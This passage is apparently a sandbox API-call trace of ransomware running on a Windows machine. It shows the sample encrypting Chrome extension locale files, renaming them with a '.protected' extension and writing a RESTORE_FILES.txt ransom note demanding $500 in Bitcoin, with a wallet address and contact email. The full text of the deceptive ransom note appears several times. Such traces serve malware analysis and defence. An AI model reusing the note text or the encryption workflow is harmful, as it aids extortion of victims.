HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.392] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.393] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.393] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.393] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc1, lpOverlapped=0x0) returned 1 [0080.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.394] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc1, lpOverlapped=0x0) returned 1 [0080.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.394] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.394] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.394] CloseHandle (hObject=0x168) returned 1 [0080.394] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.protected") returned 165 [0080.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.protected")) returned 1 [0080.395] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.395] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.396] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0080.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.396] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.396] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.397] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.397] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.397] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.397] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.397] CloseHandle (hObject=0x164) returned 1 [0080.398] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.398] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0080.398] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0080.398] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0080.398] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0080.398] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0080.398] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el") returned 141 [0080.398] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0080.398] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0080.398] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*") returned 143 [0080.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.399] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.399] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.399] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.399] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\.") returned 143 [0080.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.400] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.400] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.400] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.400] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.400] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\..") returned 144 [0080.400] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.400] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.400] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.400] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.400] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.400] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.400] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.400] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.401] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.401] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.401] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.401] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x12a, lpOverlapped=0x0) returned 1 [0080.404] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.404] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x12a, lpOverlapped=0x0) returned 1 [0080.404] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.404] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.404] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.404] CloseHandle (hObject=0x168) returned 1 [0080.405] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.protected") returned 165 [0080.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.protected")) returned 1 [0080.406] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.406] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.406] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0080.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.407] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.407] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.408] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.408] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.408] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.408] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.408] CloseHandle (hObject=0x164) returned 1 [0080.408] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.408] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0080.408] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0080.409] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0080.409] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0080.409] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0080.409] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB") returned 144 [0080.409] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0080.409] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0080.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*") returned 146 [0080.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.409] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.409] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.409] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.409] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.409] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\.") returned 146 [0080.409] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.409] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.409] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.409] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.409] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.409] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.410] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\..") returned 147 [0080.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.410] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.410] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.410] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.410] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.410] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.411] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 